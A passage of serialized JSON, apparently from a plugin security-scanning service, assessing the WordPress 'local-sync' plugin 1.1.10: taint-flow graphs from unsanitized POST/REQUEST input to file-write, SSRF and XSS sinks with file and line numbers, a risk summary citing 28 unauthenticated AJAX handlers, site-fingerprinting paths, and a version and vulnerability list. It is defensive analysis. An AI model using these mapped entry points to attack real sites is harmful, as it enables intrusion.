local_sync_log()",{"id":528,"type":529,"label":530,"file":531,"line":532,"wp_function":533},"n2","sink","file_put_contents() [File Write]","local-sync-debug.php",91,"file_put_contents",[535,536],{"from":519,"to":524,"sanitized":52},{"from":524,"to":528,"sanitized":52},{"entryPoint":538,"graph":539,"unsanitizedCount":172,"severity":69},"modify_all_files_modal_cancel (admin\\class-local-sync-admin.php:529)",{"nodes":540,"edges":545},[541,543,544],{"id":519,"type":520,"label":521,"file":379,"line":542},531,{"id":524,"type":525,"label":526,"file":379,"line":542},{"id":528,"type":529,"label":530,"file":531,"line":532,"wp_function":533},[546,547],{"from":519,"to":524,"sanitized":52},{"from":524,"to":528,"sanitized":52},{"entryPoint":549,"graph":550,"unsanitizedCount":172,"severity":69},"sync_from_live_site (admin\\class-local-sync-admin.php:608)",{"nodes":551,"edges":556},[552,554,555],{"id":519,"type":520,"label":521,"file":379,"line":553},609,{"id":524,"type":525,"label":526,"file":379,"line":553},{"id":528,"type":529,"label":530,"file":531,"line":532,"wp_function":533},[557,558],{"from":519,"to":524,"sanitized":52},{"from":524,"to":528,"sanitized":52},{"entryPoint":560,"graph":561,"unsanitizedCount":172,"severity":69},"push_to_live_site (admin\\class-local-sync-admin.php:715)",{"nodes":562,"edges":567},[563,565,566],{"id":519,"type":520,"label":521,"file":379,"line":564},716,{"id":524,"type":525,"label":526,"file":379,"line":564},{"id":528,"type":529,"label":530,"file":531,"line":532,"wp_function":533},[568,569],{"from":519,"to":524,"sanitized":52},{"from":524,"to":528,"sanitized":52},{"entryPoint":571,"graph":572,"unsanitizedCount":172,"severity":69},"process_get_steps_for_steps_parent_echo (admin\\class-local-sync-admin.php:803)",{"nodes":573,"edges":578},[574,576,577],{"id":519,"type":520,"label":521,"file":379,"line":575},806,{"id":524,"type":525,"label":526,"file":379,"line":575},{"id":528,"type":529,"label":530,"file":531,"line":532,"wp_function":533},[579,580],{"from":519,"to":524,"sanitized":52},{"from":524,"to":528,"sanitized":52},{"entryPoint":582,"graph":583,"unsanitizedCount":172,"severity":69},"start_zip_creation_dev (admin\\class-local-sync-admin.php:962)",{"nodes":584,"edges":589},[585,587,588],{"id":519,"type":520,"label":521,"file":379,"line":586},968,{"id":524,"type":525,"label":526,"file":379,"line":586},{"id":528,"type":529,"label":530,"file":531,"line":532,"wp_function":533},[590,591],{"from":519,"to":524,"sanitized":52},{"from":524,"to":528,"sanitized":52},{"entryPoint":593,"graph":594,"unsanitizedCount":172,"severity":69},"start_zip_download_dev (admin\\class-local-sync-admin.php:985)",{"nodes":595,"edges":600},[596,598,599],{"id":519,"type":520,"label":521,"file":379,"line":597},991,{"id":524,"type":525,"label":526,"file":379,"line":597},{"id":528,"type":529,"label":530,"file":531,"line":532,"wp_function":533},[601,602],{"from":519,"to":524,"sanitized":52},{"from":524,"to":528,"sanitized":52},{"entryPoint":604,"graph":605,"unsanitizedCount":172,"severity":69},"zip_extract_dev (admin\\class-local-sync-admin.php:1002)",{"nodes":606,"edges":611},[607,609,610],{"id":519,"type":520,"label":521,"file":379,"line":608},1008,{"id":524,"type":525,"label":526,"file":379,"line":608},{"id":528,"type":529,"label":530,"file":531,"line":532,"wp_function":533},[612,613],{"from":519,"to":524,"sanitized":52},{"from":524,"to":528,"sanitized":52},{"entryPoint":615,"graph":616,"unsanitizedCount":172,"severity":69},"test_button (admin\\class-local-sync-admin.php:1029)",{"nodes":617,"edges":622},[618,620,621],{"id":519,"type":520,"label":521,"file":379,"line":619},1035,{"id":524,"type":525,"label":526,"file":379,"line":619},{"id":528,"type":529,"label":530,"file":531,"line":532,"wp_function":533},[623,624],{"from":519,"to":524,"sanitized":52},{"from":524,"to":528,"sanitized":52},{"entryPoint":626,"graph":627,"unsanitizedCount":172,"severity":69},"save_settings_local_sync (admin\\class-local-sync-admin.php:1454)",{"nodes":628,"edges":633},[629,631,632],{"id":519,"type":520,"label":521,"file":379,"line":630},1456,{"id":524,"type":525,"label":526,"file":379,"line":630},{"id":528,"type":529,"label":530,"file":531,"line":532,"wp_function":533},[634,635],{"from":519,"to":524,"sanitized":52},{"from":524,"to":528,"sanitized":52},{"entryPoint":637,"graph":638,"unsanitizedCount":662,"severity":69},"\u003Cclass-local-sync-admin> (admin\\class-local-sync-admin.php:0)",{"nodes":639,"edges":657},[640,642,643,644,648,651],{"id":519,"type":520,"label":641,"file":379,"line":522},"$_POST (x20)",{"id":524,"type":525,"label":526,"file":379,"line":522},{"id":528,"type":529,"label":530,"file":531,"line":532,"wp_function":533},{"id":645,"type":520,"label":646,"file":379,"line":647},"n3","$_POST (x4)",835,{"id":649,"type":525,"label":650,"file":379,"line":647},"n4","→ wp_remote_post_local_sync()",{"id":652,"type":529,"label":653,"file":654,"line":655,"wp_function":656},"n5","wp_remote_post() [SSRF]","admin\\class-local-sync-app-functions.php",164,"wp_remote_post",[658,659,660,661],{"from":519,"to":524,"sanitized":52},{"from":524,"to":528,"sanitized":52},{"from":645,"to":649,"sanitized":52},{"from":649,"to":652,"sanitized":52},24,{"entryPoint":664,"graph":665,"unsanitizedCount":172,"severity":69},"process_get_steps_for_steps_parent_echo (local-sync-bridge\\index.php:588)",{"nodes":666,"edges":671},[667,669,670],{"id":519,"type":520,"label":521,"file":475,"line":668},591,{"id":524,"type":525,"label":526,"file":475,"line":668},{"id":528,"type":529,"label":530,"file":531,"line":532,"wp_function":533},[672,673],{"from":519,"to":524,"sanitized":52},{"from":524,"to":528,"sanitized":52},{"entryPoint":675,"graph":676,"unsanitizedCount":53,"severity":69},"\u003Cindex> (local-sync-bridge\\index.php:0)",{"nodes":677,"edges":693},[678,680,683,684,685,686,689,691],{"id":519,"type":520,"label":679,"file":475,"line":478},"$_REQUEST['prod_key_random_id']",{"id":524,"type":529,"label":681,"file":475,"line":478,"wp_function":682},"echo() [XSS]","echo",{"id":528,"type":520,"label":521,"file":475,"line":668},{"id":645,"type":525,"label":526,"file":475,"line":668},{"id":649,"type":529,"label":530,"file":531,"line":532,"wp_function":533},{"id":652,"type":520,"label":687,"file":475,"line":688},"$_REQUEST",598,{"id":690,"type":525,"label":526,"file":475,"line":688},"n6",{"id":692,"type":529,"label":530,"file":531,"line":532,"wp_function":533},"n7",[694,695,696,697,698],{"from":519,"to":524,"sanitized":52},{"from":528,"to":645,"sanitized":52},{"from":645,"to":649,"sanitized":52},{"from":652,"to":690,"sanitized":52},{"from":690,"to":692,"sanitized":52},{"entryPoint":700,"graph":701,"unsanitizedCount":172,"severity":69},"request_filesystem_credentials (local-sync-bridge\\wp-files\\file.php:1138)",{"nodes":702,"edges":707},[703,706],{"id":519,"type":520,"label":704,"file":492,"line":705},"$_POST[$field]",1370,{"id":524,"type":529,"label":681,"file":492,"line":705,"wp_function":682},[708],{"from":519,"to":524,"sanitized":52},{"entryPoint":710,"graph":711,"unsanitizedCount":29,"severity":718},"\u003Cfile> (local-sync-bridge\\wp-files\\file.php:0)",{"nodes":712,"edges":715},[713,714],{"id":519,"type":520,"label":704,"file":492,"line":705},{"id":524,"type":529,"label":681,"file":492,"line":705,"wp_function":682},[716],{"from":519,"to":524,"sanitized":717},true,"low",{"summary":720,"deductions":721},"The 'local-sync' plugin version 1.1.10 exhibits a concerning security posture, primarily due to a significantly large and unprotected attack surface. With 28 AJAX handlers identified, all of which lack authentication checks, this presents a major entry point for malicious actors to interact with the plugin's functionality without proper authorization. The static analysis also flags the presence of dangerous functions like 'unserialize' and 'exec', which, when combined with the lack of input validation indicated by taint analysis showing flows with unsanitized paths, could lead to severe vulnerabilities such as remote code execution. While the plugin does employ prepared statements for a majority of its SQL queries and shows some effort in output escaping, these positive aspects are overshadowed by the fundamental security flaws in its entry points and handling of potentially dangerous functions. The vulnerability history, including a past critical vulnerability and a pattern of missing authorization issues, further reinforces the perception of a plugin that has historically struggled with robust security. Despite the absence of currently unpatched vulnerabilities and a recent security patch in 2026, the plugin's design remains inherently risky, suggesting that new vulnerabilities could easily be introduced.",[722,725,727,729,731,734,737],{"reason":723,"points":724},"Large attack surface without auth checks",10,{"reason":726,"points":76},"Presence of dangerous functions",{"reason":728,"points":79},"Flows with unsanitized paths (taint analysis)",{"reason":730,"points":14},"Missing nonce checks on AJAX",{"reason":732,"points":733},"Low percentage of proper output escaping",4,{"reason":735,"points":736},"Past critical vulnerability (unpatched)",15,{"reason":738,"points":739},"History of missing authorization vulnerabilities",6,"2026-03-16T20:12:43.313Z",{"wat":742,"direct":755},{"assetPaths":743,"generatorPatterns":748,"scriptPaths":749,"versionParams":750},[744,745,746,747],"\u002Fwp-content\u002Fplugins\u002Flocal-sync\u002Fadmin\u002Fcss\u002Flocal-sync-admin.css","\u002Fwp-content\u002Fplugins\u002Flocal-sync\u002Fadmin\u002Fjs\u002Flocal-sync-admin.js","\u002Fwp-content\u002Fplugins\u002Flocal-sync\u002Fpublic\u002Fcss\u002Flocal-sync-public.css","\u002Fwp-content\u002Fplugins\u002Flocal-sync\u002Fpublic\u002Fjs\u002Flocal-sync-public.js",[],[745,747],[751,752,753,754],"local-sync\u002Fadmin\u002Fcss\u002Flocal-sync-admin.css?ver=","local-sync\u002Fadmin\u002Fjs\u002Flocal-sync-admin.js?ver=","local-sync\u002Fpublic\u002Fcss\u002Flocal-sync-public.css?ver=","local-sync\u002Fpublic\u002Fjs\u002Flocal-sync-public.js?ver=",{"cssClasses":756,"htmlComments":759,"htmlAttributes":762,"restEndpoints":765,"jsGlobals":768,"shortcodeOutput":776},[757,758],"local-sync-admin-wrap","ls-notice-box",[760,761],"\u003C!-- Local Sync Admin Footer -->","\u003C!-- Local Sync Main Content Area -->",[763,764],"data-ls-action","data-ls-target",[766,767],"\u002Fwp-json\u002Flocal-sync\u002Fv1\u002Fsettings","\u002Fwp-json\u002Flocal-sync\u002Fv1\u002Fmigrate",[769,770,771,772,773,774,775],"LOCAL_SYNC_SITE_TYPE","LOCAL_SYNC_PROD_URL","LOCAL_SYNC_LOCAL_URL","LOCAL_SYNC_PROD_UPLOADS_URL","LOCAL_SYNC_LOCAL_UPLOADS_URL","LOCAL_SYNC_LOAD_IMAGES_FROM_LIVE","localSyncAdmin",[777,778],"[local_sync_form]","[local_sync_status]",{"error":717,"url":780,"statusCode":781,"statusMessage":782,"message":782},"http:\u002F\u002Flocalhost\u002Fapi\u002Fplugins\u002Flocal-sync\u002Fbundle",404,"no bundle for this plugin yet",{"slug":4,"current_version":6,"total_versions":784,"versions":785},14,[786,791,797,805,812,821,830,839,848,857,866,875,884,893],{"version":6,"download_url":26,"svn_tag_url":787,"released_at":39,"has_diff":52,"diff_files_changed":788,"diff_lines":39,"trac_diff_url":789,"vulnerabilities":790,"is_current":717},"https:\u002F\u002Fplugins.svn.wordpress.org\u002Flocal-sync\u002Ftags\u002F1.1.10\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Flocal-sync%2Ftags%2F1.1.9&new_path=%2Flocal-sync%2Ftags%2F1.1.10",[],{"version":41,"download_url":792,"svn_tag_url":793,"released_at":39,"has_diff":52,"diff_files_changed":794,"diff_lines":39,"trac_diff_url":795,"vulnerabilities":796,"is_current":52},"https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Flocal-sync.1.1.9.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Flocal-sync\u002Ftags\u002F1.1.9\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Flocal-sync%2Ftags%2F1.1.8&new_path=%2Flocal-sync%2Ftags%2F1.1.9",[],{"version":798,"download_url":799,"svn_tag_url":800,"released_at":39,"has_diff":52,"diff_files_changed":801,"diff_lines":39,"trac_diff_url":802,"vulnerabilities":803,"is_current":52},"1.1.8","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Flocal-sync.1.1.8.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Flocal-sync\u002Ftags\u002F1.1.8\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Flocal-sync%2Ftags%2F1.1.7&new_path=%2Flocal-sync%2Ftags%2F1.1.8",[804],{"id":35,"url_slug":36,"title":37,"severity":42,"cvss_score":43,"vuln_type":45,"patched_in_version":41},{"version":68,"download_url":806,"svn_tag_url":807,"released_at":39,"has_diff":52,"diff_files_changed":808,"diff_lines":39,"trac_diff_url":809,"vulnerabilities":810,"is_current":52},"https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Flocal-sync.1.1.7.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Flocal-sync\u002Ftags\u002F1.1.7\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Flocal-sync%2Ftags%2F1.1.6&new_path=%2Flocal-sync%2Ftags%2F1.1.7",[811],{"id":35,"url_slug":36,"title":37,"severity":42,"cvss_score":43,"vuln_type":45,"patched_in_version":41},{"version":813,"download_url":814,"svn_tag_url":815,"released_at":39,"has_diff":52,"diff_files_changed":816,"diff_lines":39,"trac_diff_url":817,"vulnerabilities":818,"is_current":52},"1.1.6","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Flocal-sync.1.1.6.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Flocal-sync\u002Ftags\u002F1.1.6\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Flocal-sync%2Ftags%2F1.1.5&new_path=%2Flocal-sync%2Ftags%2F1.1.6",[819,820],{"id":63,"url_slug":64,"title":65,"severity":69,"cvss_score":70,"vuln_type":45,"patched_in_version":68},{"id":35,"url_slug":36,"title":37,"severity":42,"cvss_score":43,"vuln_type":45,"patched_in_version":41},{"version":822,"download_url":823,"svn_tag_url":824,"released_at":39,"has_diff":52,"diff_files_changed":825,"diff_lines":39,"trac_diff_url":826,"vulnerabilities":827,"is_current":52},"1.1.5","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Flocal-sync.1.1.5.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Flocal-sync\u002Ftags\u002F1.1.5\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Flocal-sync%2Ftags%2F1.1.4&new_path=%2Flocal-sync%2Ftags%2F1.1.5",[828,829],{"id":63,"url_slug":64,"title":65,"severity":69,"cvss_score":70,"vuln_type":45,"patched_in_version":68},{"id":35,"url_slug":36,"title":37,"severity":42,"cvss_score":43,"vuln_type":45,"patched_in_version":41},{"version":831,"download_url":832,"svn_tag_url":833,"released_at":39,"has_diff":52,"diff_files_changed":834,"diff_lines":39,"trac_diff_url":835,"vulnerabilities":836,"is_current":52},"1.1.4","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Flocal-sync.1.1.4.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Flocal-sync\u002Ftags\u002F1.1.4\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Flocal-sync%2Ftags%2F1.1.3&new_path=%2Flocal-sync%2Ftags%2F1.1.4",[837,838],{"id":63,"url_slug":64,"title":65,"severity":69,"cvss_score":70,"vuln_type":45,"patched_in_version":68},{"id":35,"url_slug":36,"title":37,"severity":42,"cvss_score":43,"vuln_type":45,"patched_in_version":41},{"version":840,"download_url":841,"svn_tag_url":842,"released_at":39,"has_diff":52,"diff_files_changed":843,"diff_lines":39,"trac_diff_url":844,"vulnerabilities":845,"is_current":52},"1.1.3","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Flocal-sync.1.1.3.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Flocal-sync\u002Ftags\u002F1.1.3\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Flocal-sync%2Ftags%2F1.1.2&new_path=%2Flocal-sync%2Ftags%2F1.1.3",[846,847],{"id":63,"url_slug":64,"title":65,"severity":69,"cvss_score":70,"vuln_type":45,"patched_in_version":68},{"id":35,"url_slug":36,"title":37,"severity":42,"cvss_score":43,"vuln_type":45,"patched_in_version":41},{"version":849,"download_url":850,"svn_tag_url":851,"released_at":39,"has_diff":52,"diff_files_changed":852,"diff_lines":39,"trac_diff_url":853,"vulnerabilities":854,"is_current":52},"1.1.2","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Flocal-sync.1.1.2.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Flocal-sync\u002Ftags\u002F1.1.2\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Flocal-sync%2Ftags%2F1.1.1&new_path=%2Flocal-sync%2Ftags%2F1.1.2",[855,856],{"id":63,"url_slug":64,"title":65,"severity":69,"cvss_score":70,"vuln_type":45,"patched_in_version":68},{"id":35,"url_slug":36,"title":37,"severity":42,"cvss_score":43,"vuln_type":45,"patched_in_version":41},{"version":858,"download_url":859,"svn_tag_url":860,"released_at":39,"has_diff":52,"diff_files_changed":861,"diff_lines":39,"trac_diff_url":862,"vulnerabilities":863,"is_current":52},"1.1.1","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Flocal-sync.1.1.1.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Flocal-sync\u002Ftags\u002F1.1.1\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Flocal-sync%2Ftags%2F1.1.0&new_path=%2Flocal-sync%2Ftags%2F1.1.1",[864,865],{"id":63,"url_slug":64,"title":65,"severity":69,"cvss_score":70,"vuln_type":45,"patched_in_version":68},{"id":35,"url_slug":36,"title":37,"severity":42,"cvss_score":43,"vuln_type":45,"patched_in_version":41},{"version":867,"download_url":868,"svn_tag_url":869,"released_at":39,"has_diff":52,"diff_files_changed":870,"diff_lines":39,"trac_diff_url":871,"vulnerabilities":872,"is_current":52},"1.1.0","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Flocal-sync.1.1.0.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Flocal-sync\u002Ftags\u002F1.1.0\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Flocal-sync%2Ftags%2F1.0.5&new_path=%2Flocal-sync%2Ftags%2F1.1.0",[873,874],{"id":63,"url_slug":64,"title":65,"severity":69,"cvss_score":70,"vuln_type":45,"patched_in_version":68},{"id":35,"url_slug":36,"title":37,"severity":42,"cvss_score":43,"vuln_type":45,"patched_in_version":41},{"version":876,"download_url":877,"svn_tag_url":878,"released_at":39,"has_diff":52,"diff_files_changed":879,"diff_lines":39,"trac_diff_url":880,"vulnerabilities":881,"is_current":52},"1.0.5","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Flocal-sync.1.0.5.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Flocal-sync\u002Ftags\u002F1.0.5\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Flocal-sync%2Ftags%2F1.0.2&new_path=%2Flocal-sync%2Ftags%2F1.0.5",[882,883],{"id":63,"url_slug":64,"title":65,"severity":69,"cvss_score":70,"vuln_type":45,"patched_in_version":68},{"id":35,"url_slug":36,"title":37,"severity":42,"cvss_score":43,"vuln_type":45,"patched_in_version":41},{"version":885,"download_url":886,"svn_tag_url":887,"released_at":39,"has_diff":52,"diff_files_changed":888,"diff_lines":39,"trac_diff_url":889,"vulnerabilities":890,"is_current":52},"1.0.2","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Flocal-sync.1.0.2.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Flocal-sync\u002Ftags\u002F1.0.2\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Flocal-sync%2Ftags%2F1.0.1&new_path=%2Flocal-sync%2Ftags%2F1.0.2",[891,892],{"id":63,"url_slug":64,"title":65,"severity":69,"cvss_score":70,"vuln_type":45,"patched_in_version":68},{"id":35,"url_slug":36,"title":37,"severity":42,"cvss_score":43,"vuln_type":45,"patched_in_version":41},{"version":894,"download_url":895,"svn_tag_url":896,"released_at":39,"has_diff":52,"diff_files_changed":897,"diff_lines":39,"trac_diff_url":39,"vulnerabilities":898,"is_current":52},"1.0.1","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Flocal-sync.1.0.1.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Flocal-sync\u002Ftags\u002F1.0.1\u002F",[],[899,900],{"id":63,"url_slug":64,"title":65,"severity":69,"cvss_score":70,"vuln_type":45,"patched_in_version":68},{"id":35,"url_slug":36,"title":37,"severity":42,"cvss_score":43,"vuln_type":45,"patched_in_version":41}]